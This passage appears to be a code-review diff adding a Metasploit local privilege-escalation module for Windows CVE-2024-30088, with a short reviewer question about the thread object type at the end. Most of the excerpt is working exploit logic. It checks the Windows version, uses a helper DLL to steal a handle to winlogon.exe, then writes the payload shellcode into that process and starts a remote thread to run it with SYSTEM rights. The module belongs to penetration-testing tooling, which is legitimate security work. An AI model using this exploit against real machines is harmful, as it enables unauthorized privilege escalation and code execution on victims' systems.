modules/exploits/windows/local/cve_2024_30088_authz_basep.rb

```diff
@@ -0,0 +1,176 @@
+                   version.build_number.between?(Msf::WindowsVersion::Server2022_23H2, Rex::Version.new('10.0.25398.950'))
+
+    false
+  end
+
+  def check
+    return Exploit::CheckCode::Safe('Non Windows systems are not affected') unless session.platform == 'windows'
+
+    version = get_version_info
+    return Exploit::CheckCode::Appears("Version detected: #{version}") if target_compatible?(version)
+
+    CheckCode::Safe("Version detected: #{version}")
+  end
+
+  def get_winlogon_pid
+    processes = client.sys.process.get_processes
+    winlogon_pid = nil
+    processes.each do |process|
+      if process['name'].downcase == 'winlogon.exe'
+        winlogon_pid = process['pid']
+        break
+      end
+    end
+
+    winlogon_pid
+  end
+
+  def get_winlogon_handle
+    pid = session.sys.process.getpid
+    process_handle = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
+    address = process_handle.memory.allocate(8)
+
+    execute_dll(
+      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2024-30088', 'CVE-2024-30088.x64.dll'),
+      address,
+      pid
+    )
+
+    winlogon_handle = nil
+    current_memory = process_handle.memory.read(address, 8)
+    initial_memory = current_memory
+    print_status('Attempting to steal the handle from the winlogon process...')
+
+    retry_until_truthy(timeout: datastore['SLEEP']) do
+      current_memory = process_handle.memory.read(address, 8)
+      break if current_memory != initial_memory
+    end
+
+    if current_memory != initial_memory
+      winlogon_handle = current_memory.unpack('Q<').first
+    end
+    winlogon_handle
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    version = get_version_info
+    unless target_compatible?(version)
+      fail_with(Failure::NoTarget, "The exploit does not support this version of Windows: #{version}")
+    end
+
+    winlogon_handle = get_winlogon_handle
+    fail_with(Failure::UnexpectedReply, 'Unable to retrieve the winlogon handle') unless winlogon_handle
+    print_good("Successfully stole winlogon handle: #{winlogon_handle}")
+
+    winlogon_pid = get_winlogon_pid
+    fail_with(Failure::UnexpectedReply, 'Unable to retrieve the winlogon pid') unless winlogon_pid
+    print_good("Successfully retrieved winlogon pid: #{winlogon_pid}")
+
+    host = session.sys.process.new(winlogon_pid, winlogon_handle)
+    shellcode = payload.encoded
+    shell_addr = host.memory.allocate(shellcode.length)
+    host.memory.protect(shell_addr)
+
+    if host.memory.write(shell_addr, shellcode) < shellcode.length
+      fail_with(Failure::UnexpectedReply, 'Failed to write shellcode')
+    end
+
+    vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{winlogon_pid})")
+    thread = host.thread.create(shell_addr, 0)
+    unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread)
```

Comment:
Does the thread have to be an instance of `Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread`? (todo)